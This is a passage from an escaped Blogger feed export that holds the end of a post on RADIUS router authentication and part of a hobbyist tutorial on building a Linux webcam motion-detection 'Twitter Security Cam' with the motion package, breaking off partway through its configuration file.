/&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;click on the &lt;strong&gt;Finish &lt;/strong&gt;button after you have entered all the settings.&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;that’s it, that should take care of the radius server and the router communication. on the next post we will setup the group policy to authenticate our domain users.&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-8025505277182811?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/8025505277182811/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/setup-linksys-router-with-radius-server.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/8025505277182811'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/8025505277182811'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/setup-linksys-router-with-radius-server.html' title='Setup Linksys Router With Radius Server Authentication'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-1192226118678207275</id><published>2010-02-05T22:45:00.000-08:00</published><updated>2010-02-05T22:46:22.153-08:00</updated><title type='text'>Twitter Security Cam</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(204, 204, 204); -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;So its Saturday afternoon and you have nothing to do. As you glance around your room you spot a half full beer, a webcam, and that linux box that you have been wondering what you were going to do with. Seriously, why did you buy that piece of crap webcam anyway? A quick google search reveals that you might have a hard time even getting that thing working in XP, let alone your preferred OS of choice, OSX. =)&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;Ok, I know what to do.  First dont drink that beer.. Its old. Throw it away and clean up your room a little bit. Then go get another beer -- and lets try to finish this one Nancy. As you sit back and nurse your new beer you notice that your Asus EEE with BackTrack4 is in a somewhat different place than you left it. Instead of simply plotting your revenge on who ever you feel deserves the blame, lets try catching them next time red-handed.&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); text-align: center; "&gt;&lt;img src="http://i-hacked.com/images/stories/twittersec/motion.jpg" /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;The following will walk you through setting up a video-surveillance system that will detect motion, enable your webcam, take pictures of the intruder, and upload the pics online and notify your cell phone via an twitter SMS message.&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;You will need:&lt;/p&gt;&lt;ul&gt;&lt;li style="list-style-image: url(http://www.i-hacked.com/templates/akodarkgem/images/arrow.png); "&gt;USB Webcam&lt;/li&gt;&lt;li style="list-style-image: url(http://www.i-hacked.com/templates/akodarkgem/images/arrow.png); "&gt;Linux installed on a machine (I will use &lt;a href="http://www.i-hacked.com/content/view/277/1/#" class="kLink" target="undefined" id="KonaLink0" style="color: white !important; font-weight: bold; text-decoration: underline !important; border-bottom-style: none !important; cursor: pointer; font-family: verdana; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 0px !important; border-top-style: none !important; border-right-style: none !important; border-left-style: none !important; border-top-color: transparent !important; border-right-color: transparent !important; border-bottom-color: transparent !important; border-left-color: transparent !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: transparent !important; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; text-transform: none !important; display: inline !important; font-variant: normal; top: 0px; right: 0px; bottom: 0px; left: 0px; position: static; background-position: initial initial !important; "&gt;&lt;span style="color: white !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; color:white;"&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;Ubuntu&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; "Gutsy Gibbon" in my example, but should be similar for other Linux distros)&lt;/li&gt;&lt;li style="list-style-image: url(http://www.i-hacked.com/templates/akodarkgem/images/arrow.png); "&gt;All ways on internet connection&lt;/li&gt;&lt;/ul&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;Before we begin, you will want to make sure your webcam is supported by your Linux distro. First lets check to see if it works out of the box. Turn on your machine and login. Plug in your USB video camera and open a terminal window. Type:&lt;/p&gt;&lt;table width="100%" cellspacing="0" cellpadding="6" border="0"&gt;&lt;tbody&gt;&lt;tr style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;td class="alt2" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: inset; border-right-style: inset; border-bottom-style: inset; border-left-style: inset; border-color: initial; "&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;lsusb&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;to determine if your webcam was detected. Your output should look something simiar to:&lt;/p&gt;&lt;table width="100%" cellspacing="0" cellpadding="6" border="0"&gt;&lt;tbody&gt;&lt;tr style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;td class="alt2" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: inset; border-right-style: inset; border-bottom-style: inset; border-left-style: inset; border-color: initial; "&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;hevnsnt@linuxbox:~/motion$ lsusb&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;Bus 003 Device 001: ID 0000:0000&lt;br /&gt;Bus 002 Device 007: ID 045e:0039 Microsoft Corp. IntelliMouse Optical&lt;br /&gt;Bus 002 Device 006: ID 0553:0002 STMicroelectronics Imaging Division (VLSI Vision) CPiA WebCam Bus 002 Device 001: ID 0000:0000&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p align="center" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;em&gt;(Although of course your output will match your configuration)&lt;/em&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;Record the bus location and device id of your webcam. (Bus 002 Device 006 in this example.) Now open "Ekiga Softphone" (installed by default in Ubuntu under Applications / Internet / Ekiga Softphone).&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;We are going to use this application to make sure that your USB camera is working (so far without ANY WORK!) You might have to click the camera icon, and if everything works, you should be getting a live picture. If not, check your Ekiga Preferences (Edit/Preferences/Video Devices) and change your input device to the device you discovered earlier. If this doesn't work you should Google for the device ID plus &lt;a href="http://www.i-hacked.com/content/view/277/1/#" class="kLink" target="undefined" id="KonaLink1" style="color: white !important; font-weight: bold; text-decoration: underline !important; border-bottom-style: none !important; cursor: pointer; font-family: verdana; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 0px !important; border-top-style: none !important; border-right-style: none !important; border-left-style: none !important; border-top-color: transparent !important; border-right-color: transparent !important; border-bottom-color: transparent !important; border-left-color: transparent !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: transparent !important; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; text-transform: none !important; display: inline !important; font-variant: normal; top: 0px; right: 0px; bottom: 0px; left: 0px; position: static; background-position: initial initial !important; "&gt;&lt;span style="color: white !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; color:white;"&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;Linux &lt;/span&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;driver&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;. (eg 0553:0002 linux driver) Come back to this tutorial when you get it working. If you cant get it working check &lt;a href="http://www.craigslist.org/" style="color: rgb(93, 116, 163); font-weight: bold; text-decoration: none; "&gt;craigslist.org&lt;/a&gt; for a newer camera, but I doubt you will need to. Seriously If I got this crusty old zoom 1595 camera working, I am sure you can get yours working.&lt;/p&gt;&lt;h1&gt;Detecting Motion:&lt;/h1&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;In order to detect motion, we are going to use a &lt;a href="http://www.i-hacked.com/content/view/277/1/#" class="kLink" target="undefined" id="KonaLink2" style="color: white !important; font-weight: bold; text-decoration: underline !important; border-bottom-style: none !important; cursor: pointer; font-family: verdana; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 0px !important; border-top-style: none !important; border-right-style: none !important; border-left-style: none !important; border-top-color: transparent !important; border-right-color: transparent !important; border-bottom-color: transparent !important; border-left-color: transparent !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: transparent !important; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; text-transform: none !important; display: inline !important; font-variant: normal; top: 0px; right: 0px; bottom: 0px; left: 0px; position: static; background-position: initial initial !important; "&gt;&lt;span style="color: white !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; color:white;"&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;software&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; motion detection package appropriately titled "&lt;a href="http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" style="color: rgb(93, 116, 163); font-weight: bold; text-decoration: none; "&gt;motion&lt;/a&gt;". Now since I know you probably are on a &lt;del&gt;debian&lt;/del&gt; Ubuntu machine, so you are thinking "Oh this will be easy, apt-get install motion". Well you did get one thing right, it will be easy, but we are not going to use apt-get. The ubuntu repositories still have a much older version of "motion" than we want. To get the latest version (this tutorial was written using build 3.2.11) open a terminal window and type the following commands: (note this will download and install a .deb, you could always install &lt;a href="http://prdownloads.sourceforge.net/motion/motion-3.2.11.tar.gz?download" style="color: rgb(93, 116, 163); font-weight: bold; text-decoration: none; "&gt;from source&lt;/a&gt;)&lt;/p&gt;&lt;table width="100%" cellspacing="0" cellpadding="6" border="0"&gt;&lt;tbody&gt;&lt;tr style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;td class="alt2" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: inset; border-right-style: inset; border-bottom-style: inset; border-left-style: inset; border-color: initial; "&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;mkdir ~/motion&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;cd ~/motion&lt;br /&gt;wget &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;http://prdownloads.sourceforge.net/motion/motion_3.2.11-1.ubuntu.hardy_i386.deb?download&lt;br /&gt;sudo dpkg -i motion_3.2.11-1.ubuntu.hardy_i386.deb&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;Congratulations, you have installed motion. Yeah Ubuntu! Now you just need to configure it. And let me tell you, there is A TON of configuration options, luckily it comes with a very well commented &lt;a href="http://www.i-hacked.com/content/view/277/1/#" class="kLink" target="undefined" id="KonaLink3" style="color: white !important; font-weight: bold; text-decoration: underline !important; border-bottom-style: none !important; cursor: pointer; font-family: verdana; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 0px !important; border-top-style: none !important; border-right-style: none !important; border-left-style: none !important; border-top-color: transparent !important; border-right-color: transparent !important; border-bottom-color: transparent !important; border-left-color: transparent !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: transparent !important; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; text-transform: none !important; display: inline !important; font-variant: normal; top: 0px; right: 0px; bottom: 0px; left: 0px; position: static; background-position: initial initial !important; "&gt;&lt;span style="color: white !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; color:white;"&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;configuration &lt;/span&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;file&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; located at /etc/motion/motion.conf. Should you want to tweak your installation later, I would start with this configuration file.&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;However, for the sake of quicky-ness, I will share my configuration file that I spent a lot of time tuning and testing for my setup. Save it to ~/motion/motion.conf&lt;/p&gt;&lt;table width="100%" cellspacing="0" cellpadding="6" border="0"&gt;&lt;tbody&gt;&lt;tr style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;td class="alt2" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: inset; border-right-style: inset; border-bottom-style: inset; border-left-style: inset; border-color: initial; "&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# TwitterSecuritySystem motion.conf&lt;br /&gt;# This config file was created for motion 3.2.11&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;############################################################&lt;br /&gt;# Daemon&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Start in daemon (background) mode and release terminal (default: off)&lt;br /&gt;daemon on&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# File to store the process ID, also called pid file. (default: not defined)&lt;br /&gt;process_id_file /var/run/motion/motion.pid&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;###########################################################&lt;br /&gt;# Capture device options&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Videodevice to be used for capturing (default /dev/video0)&lt;br /&gt;videodevice /dev/video0&lt;br /&gt;v4l2_palette 8&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# The video input to be used (default: 8)&lt;br /&gt;# Should normally be set to 0 or 1 for video/TV cards, and 8 for USB cameras&lt;br /&gt;input 8&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# The video norm to use (only for video capture and TV tuner cards)&lt;br /&gt;# Values: 0 (PAL), 1 (NTSC), 2 (SECAM), 3 (PAL NC no colour). Default: 0 (PAL)&lt;br /&gt;norm 1&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Rotate image this number of degrees. The rotation affects all saved images as&lt;br /&gt;# well as mpeg movies. Valid values: 0 (default = no rotation), 90, 180 and 270.&lt;br /&gt;rotate 0&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Image width (pixels). Valid range: Camera dependent, default: 352&lt;br /&gt;width 320&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Image height (pixels). Valid range: Camera dependent, default: 288&lt;br /&gt;height 240&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Maximum number of frames to be captured per second.&lt;br /&gt;# Valid range: 2-100. Default: 100 (almost no limit).&lt;br /&gt;framerate 2&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Minimum time in seconds between capturing picture frames from the camera.&lt;br /&gt;# Default: 0 = disabled - the capture rate is given by the camera framerate.&lt;br /&gt;# This option is used when you want to capture images at a rate lower than 2 per second.&lt;br /&gt;minimum_frame_time 3&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;auto_brightness off&lt;br /&gt;brightness 0&lt;br /&gt;contrast 0&lt;br /&gt;saturation 0&lt;br /&gt;hue 0&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;############################################################&lt;br /&gt;# Motion Detection Settings:&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Threshold for number of changed pixels in an image that&lt;br /&gt;# triggers motion detection (default: 1500)&lt;br /&gt;threshold 1500&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Automatically tune the threshold down if possible (default: off)&lt;br /&gt;threshold_tune off&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Noise threshold for the motion detection (default: 32)&lt;br /&gt;noise_level 32&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Automatically tune the noise threshold (default: on)&lt;br /&gt;noise_tune on&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Despeckle motion image using (e)rode or (d)ilate or (l)abel (Default: not defined)&lt;br /&gt;# Recommended value is EedDl. Any combination (and number of) of E, e, d, and D is valid.&lt;br /&gt;# (l)abeling must only be used once and the 'l' must be the last letter.&lt;br /&gt;# Comment out to disable&lt;br /&gt;despeckle EedDl&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Ignore sudden massive light intensity changes given as a percentage of the picture&lt;br /&gt;# area that changed intensity. Valid range: 0 - 100 , default: 0 = disabled&lt;br /&gt;lightswitch 0&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Picture frames must contain motion at least the specified number of frames&lt;br /&gt;# in a row before they are detected as true motion. At the default of 1, all&lt;br /&gt;# motion is detected. Valid range: 1 to thousands, recommended 1-5&lt;br /&gt;minimum_motion_frames 1&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Specifies the number of pre-captured (buffered) pictures from before motion&lt;br /&gt;# was detected that will be output at motion detection.&lt;br /&gt;# Recommended range: 0 to 5 (default: 0)&lt;br /&gt;# Do not use large values! Large values will cause Motion to skip video frames and&lt;br /&gt;# cause unsmooth mpegs. To smooth mpegs use larger values of post_capture instead.&lt;br /&gt;pre_capture 0&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Gap is the seconds of no motion detection that triggers the end of an event&lt;br /&gt;# An event is defined as a series of motion images taken within a short timeframe.&lt;br /&gt;# Recommended value is 60 seconds (Default). The value 0 is allowed and disables&lt;br /&gt;# events causing all Motion to be written to one single mpeg file and no pre_capture.&lt;br /&gt;gap 60&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;############################################################&lt;br /&gt;# Image File Output&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Output 'normal' pictures when motion is detected (default: on)&lt;br /&gt;# Valid values: on, off, first, best, center&lt;br /&gt;# When set to 'first', only the first picture of an event is saved.&lt;br /&gt;# Picture with most motion of an event is saved when set to 'best'.&lt;br /&gt;# Picture with motion nearest center of picture is saved when set to 'center'.&lt;br /&gt;# Can be used as preview shot for the corresponding movie.&lt;br /&gt;output_normal center&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# The quality (in percent) to be used by the jpeg compression (default: 75)&lt;br /&gt;quality 75&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;############################################################&lt;br /&gt;# Text Display&lt;br /&gt;# %Y = year, %m = month, %d = date,&lt;br /&gt;# %H = hour, %M = minute, %S = second, %T = HH:MM:SS,&lt;br /&gt;# %v = event, %q = frame number, %t = thread (camera) number,&lt;br /&gt;# %D = changed pixels, %N = noise level, \n = new line,&lt;br /&gt;# %i and %J = width and height of motion area,&lt;br /&gt;# %K and %L = X and Y coordinates of motion center&lt;br /&gt;# %C = value defined by text_event - do not use with text_event!&lt;br /&gt;# You can put quotation marks around the text to allow&lt;br /&gt;# leading spaces&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Locate and draw a box around the moving object.&lt;br /&gt;# Valid values: on, off and preview (default: off)&lt;br /&gt;# Set to 'preview' will only draw a box in preview_shot pictures.&lt;br /&gt;locate on&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Draws the timestamp using same options as C function strftime(3)&lt;br /&gt;# Default: %Y-%m-%d\n%T = date in ISO format and time in 24 hour clock&lt;br /&gt;# Text is placed in lower right corner&lt;br /&gt;text_right %Y-%m-%d\n%T-%q&lt;br /&gt;text_event %Y%m%d%H%M%S&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Draw characters at twice normal size on images. (default: off)&lt;br /&gt;text_double off&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;############################################################&lt;br /&gt;# Target Directories and filenames For Images And Films&lt;br /&gt;# For the options snapshot_, jpeg_, mpeg_ and timelapse_filename&lt;br /&gt;# you can use conversion specifiers&lt;br /&gt;# %Y = year, %m = month, %d = date,&lt;br /&gt;# %H = hour, %M = minute, %S = second,&lt;br 